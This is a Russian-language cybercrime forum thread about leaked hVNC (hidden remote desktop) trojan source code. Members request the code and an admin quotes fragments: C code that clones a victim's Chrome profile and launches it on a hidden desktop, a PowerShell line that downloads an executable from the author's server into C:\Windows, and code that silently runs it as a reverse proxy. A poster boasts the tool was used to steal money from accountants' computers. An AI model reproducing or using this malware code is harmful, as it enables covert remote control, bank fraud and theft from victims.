the source code of the hvnc. fully working tested in combat. coded by x4k.

[amgmers]

родной, для Вас скину в пм. или куда вам там можно закинуть
это - элитный тининюк. >>> ага с блэк-джеком и шлюхами
Artem N он предлагал половину ему нига сказал - I will pay for u life.
Ну ок. чунага-чанга если читаешь - дава мы тут если че

закинь в пм. хочется поизучать

 

[Antarus]

Тоже захотелось бы посмотреть. Но увы, 300 за год не соберешь

 

[KAJIT]

Но увы, 300 за год не соберешь

хз. я собрал.
раздал сабж кто просил.

 

[fghz111]

Написал в пм

 

[Haunt]

Если че, хром начиная с 92 версии, себя завершает, если запущен на скрытом десктопе через lpDesktop.
Так что где тут «fully working»…

static void StartChrome()
{
    char chromePath[MAX_PATH] = { 0 };
    SHGetFolderPathA(NULL, CSIDL_LOCAL_APPDATA, NULL, 0, chromePath);
    lstrcatA(chromePath, (XorString("\\Google\\Chrome\\")));

    char dataPath[MAX_PATH] = { 0 };
    lstrcatA(dataPath, chromePath);
    lstrcatA(dataPath, (XorString("User Data\\")));

    char botId[BOT_ID_LEN] = { 0 };
    char newDataPath[MAX_PATH] = { 0 };
    lstrcatA(newDataPath, chromePath);
    GetBotId(botId);
    lstrcatA(newDataPath, botId);

    CopyDir(dataPath, newDataPath);

    char path[MAX_PATH] = { 0 };
    lstrcatA(path, (XorString("cmd.exe /c start ")));
    lstrcatA(path, (XorString("chrome.exe")));
    lstrcatA(path, (XorString(" --no-sandbox --allow-no-sandbox-job --disable-3d-apis --disable-gpu --disable-d3d11  --origin-trial-disabled-features=SecurePaymentConfirmation --user-data-dir=")));
    lstrcatA(path, (PCHAR)"\"");
    lstrcatA(path, newDataPath);

    STARTUPINFOA startupInfo = { 0 };
    startupInfo.cb = sizeof(startupInfo);
    startupInfo.lpDesktop = g_desktopName;
    PROCESS_INFORMATION processInfo = { 0 };
    IFN(CreateProcessA)(NULL, path, NULL, NULL, FALSE, 0, NULL, NULL, &startupInfo, &processInfo);
}

2) Че это за говно подгружается с его репо?

frph_exe='$f="c:\\Windows\\frph.exe";if (-not(Test-Path -Path $f -PathType Leaf)) {iwr -useb repo.x4k.dev/windows/frph.exe -out C:\\Windows\\frph.exe}

И далее в server.cpp

int __stdcall start_revhvnc()
{
        HANDLE hThread;
        WinExec("cmd /b /c start /min frph -c C:\\Windows\\frph.ini", SW_HIDE);
        return WaitForSingleObject(hThread, INFINITE);
}

И далее в WinMain

...
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)start_revhvnc,NULL, 0, NULL);
...

Вы же понимаете, что source code это код? А не бинари, которые не то, что просто в комплекте идут, а подкачиваются в динамике с его серверов. Если бы вы шарили сорцы, следовало бы приложить в архиве статичные сорцы frph.exe и с них уже делать билд. Как минимум ip серверов, где это будет запущено - будут ему видны, либо ментам, если его скомпрометируют. И если hvnc коннекты без протекта пассами, то он тупо спиздит ваших ботов. Либо просто задеанонит ваши сервера. Как максимум, вас скомпрометируют, в один момент подменит бинарь у себя на серваке… и вам полетит frph.exe со склейкой(чем бы это ни было изначально). Одним словом, не рекомендую использовать этот sh скрипт, ради вашей же безопасности.
Мистеру x4k, желаю прямых рук, если его намерения все же были благими. Но подозреваю, что данный персонаж психически нестабилен(солевой или че) и решил отомстить всему миру таким образом после его бана. На биржах модеров такими техниками разводить будешь, дружок.
А вам, KAJIT, хоть немного разбираться в том, что распространяете.
Quake3, admin

 

[Exfazo]

не рекомендую использовать этот sh скрипт, ради вашей же безопасности.

Да и смысла нету, он ни чем от тини не отличается. + для новичков скомпилить будет легче тини, а не этот подсос

 

[KAJIT]

А вам, KAJIT, хоть немного разбираться в том, что распространяете.

Уважаемые, я в курсе о том что перечислили выше. Я этого не верстал, расширил как есть. Для того что я делаю этого скрипта достаточно. И чистоты его мне хватает.
Код был писан для работы в связке с кобальтом и системой. Мне плевать то что там куски нюка по коду разбросаны, и в основном они там. Хаунта я благодаряю, но к тем кто начинаент орать мне в пм -->> вы так попробуйте для начала, собрать ( я не пытаюс не кого задеть , Just совет возмите труп нюка, и попробуйте собрать вот так - вам полезно будет.

А в вам, KAJIT

А вам спасибо что нашли время описать, поделку моего друга, не смотря на то что он тут всех ху#сосил подряд.
Немного причосаное приложил вот еще. Мб кому пригодится. Неоднократно с эджа и осла быливыведены бабки с компа бухгалтерш в сети
Че это за говно подгружается с его репо? --> lol. Ща поправил не подгружается в прикрепленном скрипте.

 

[yashechka]

2) Че это за говно подгружается с его репо?

Это как раз, блек джек и шлюхи, если ты не понял.

 

[yashechka]

Тоже захотелось бы посмотреть. Но увы, 300 за год не соберешь

Купи премиум - помоги форуму, увидишь все хайды, хоть за 10000 захайденные.

 

[KAJIT]

ну как то так =\

Спойлер: comment_by_x4k

x4k ?, [10/30/21 9:05 PM]
так напиши мистер хаунд

x4k ?, [10/30/21 9:05 PM]
закачайте бинарникт

x4k ?, [10/30/21 9:05 PM]
frp

x4k ?, [10/30/21 9:05 PM]
га прямой линк

x4k ?, [10/30/21 9:05 PM]
и замените ссылки в скриптах

x4k ?, [10/30/21 9:06 PM]
и паранойа - скорее у вас ))

x4k ?, [10/30/21 9:06 PM]
к тому же существует тн

x4k ?, [10/30/21 9:06 PM]
sha512 контррольные суммые

x4k ?, [10/30/21 9:06 PM]
можете сравнить их

x4k ?, [10/30/21 9:06 PM]
оф релиз фрп и тот кот у меня на сайте

x4k ?, [10/30/21 9:12 PM]

GitHub - fatedier/frp: A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet.

A fast reverse proxy to help you expose a local server behind a NAT or firewall to the internet. - fatedier/frp

github.com

x4k ?, [10/30/21 9:12 PM]
сорцы фрп

x4k ?, [10/30/21 9:12 PM]
тыкни хаунду пусть компилирует =)

x4k ?, [10/30/21 9:13 PM]
умнику =)

x4k ?, [10/30/21 9:14 PM]
дети)

x4k ?, [10/30/21 9:15 PM]
еесли этот дятел не знает про фрп

x4k ?, [10/30/21 9:15 PM]
то ему обратно в школу\

x4k ?, [10/30/21 9:21 PM]
hfrp - это ничто иное как последний релиз фрп, взятый https://github.com/fatedier/frp/releases/latest

x4k ?, [10/30/21 9:22 PM]
для винды. каждый может загрузить его по прямой ссылке и испоользовать)

x4k ?, [10/30/21 9:22 PM]
да не я тебе пишу что передать им

x4k ?, [10/30/21 9:22 PM]
и скажи что клей сейчас без салутона и очень токсичен вызывает парнойю. пусть не злоупотребляет

x4k ?, [10/30/21 9:23 PM]
фрпс нужно отсюда. это сервер

x4k ?, [10/30/21 9:23 PM]
фрпц - клиент. он не нужен)

x4k ?, [10/30/21 9:23 PM]
или нужен

x4k ?, [10/30/21 9:24 PM]
уже не помню

x4k ?, [10/30/21 9:24 PM]
короче фрп это вот =()

x4k ?, [10/30/21 9:24 PM]
да нах вон шитхаб

x4k ?, [10/30/21 9:25 PM]
напиши что товарищу из китая fatedier с 50к звезд (только фрп) сраный Haunt
и его товарщи менты, о которых он так часто напоминает совсем до лампочки. он из другой страны

 

[DildoFagins]

ну как то так =\

Прочел это и прям на душе стало так тепло, на форуме не особо осталось таких людей, у которых пукан взрывается от любой мелочи, эх... Но все же это не адресует проблему, про которую говорил Haunt. Наш любимый мистер Хацк может в любой момент заменить на своем уютненьком сайте любую публичную тулзу на тулзу, которая протроянит самого пользователя этих ваших элитных баш скриптов, или же протроянит тех, кого протроянил сам пользователь. И опять же, если тулза публичная и доступна на гитхабе, то какая еще причина копировать её себе на свои уютненькие сайтики, кроме как оставить себе бекдорчики на своих афроамериканских клиентов. Можно же было прямую ссылку на гитхаб вставить.

 

[WhiteDragon]

то ему обратно в школу\

Сильно как-то.

Неужели в 21 году запускают через скрытый стол, фантазии не хватает чтоб не рисовать с PrintWindow или че. На соседнем борде фулл концепт стоит 2-3 детектами...
Хоть я не тру кодер, но мне кажется, что нынешнему кодингу не хватает креативности в плане реализации и ресерча.
Те же вебинжекты можно делать без самого инжекта с вызовом одного апи и фулл доступом к дереву страницы без дампа трафа или прокси.

 

[KAJIT]

Дааа все-таки не зря я положил этот, по мнению большинства говно кодес тут.

На соседнем борде фулл концепт стоит 2-3 детектами...

принеси линк, будь так любезен. я невидел. мб прост не заметил. Посты пишу курлом через cli, и не особо листаю че тут и где. Очень признателен.
Жаль что не кто, так и не собрал это, судя потому что в пм ток просят, но
не кто не задает вопросов как собрать. Но оно и понятно кому этот ваш франкенштейн из нюка нужен тот.хех

Прочел это и прям на душе стало так тепло

дак это.. я тут вообще то для тебя стараюс, я знал что ты оценишь, второй бы скрепт хоть глянул там уже нету x4k репо все по вычищал. ну нет-так нет =)
ну согласись скушно без него както?не? я скучаю по вашим срачам RIP

 

[_start]

Можно же было прямую ссылку на гитхаб вставить.

Думаю причина в отсутствии собранного ехе, на гитхаб только сорцы.

 

[mectury]

Я бы хотел, чтобы у меня было 300 реакций

 

[KAJIT]

Я бы хотел, чтобы у меня было 300 реакций

перечитай трэд, я выложил без хайда и без линков на репо x4k-a

 

[sereganochnoi]

Купи премиум - помоги форуму, увидишь все хайды, хоть за 10000 захайденные.

С такими хайдами премиум не нужен

 

[TheWinnieThePooh1337]

В подарке не нуждаюсь, а вот за x4k скучаю ?

dead or arrested?

 

[TheWinnieThePooh1337]

Уважаемые, я в курсе о том что перечислили выше. Я этого не верстал, расширил как есть. Для того что я делаю этого скрипта достаточно. И чистоты его мне хватает.
Код был писан для работы в связке с кобальтом и системой. Мне плевать то что там куски нюка по коду разбросаны, и в основном они там. Хаунта я благодаряю, но к тем кто начинаент орать мне в пм -->> вы так попробуйте для начала, собрать ( я не пытаюс не кого задеть , Just совет возмите труп нюка, и попробуйте собрать вот так - вам полезно будет.

А вам спасибо что нашли время описать, поделку моего друга, не смотря на то что он тут всех ху#сосил подряд.
Немного причосаное приложил вот еще. Мб кому пригодится. Неоднократно с эджа и осла быливыведены бабки с компа бухгалтерш в сети
Че это за говно подгружается с его репо? --> lol. Ща поправил не подгружается в прикрепленном скрипте.

Thanks x4d for me

 

[KAJIT]

dead or arrested?

nope. He`s -> f1n3 4nd s4y h3110 t0 u Fr0m 1337 XDD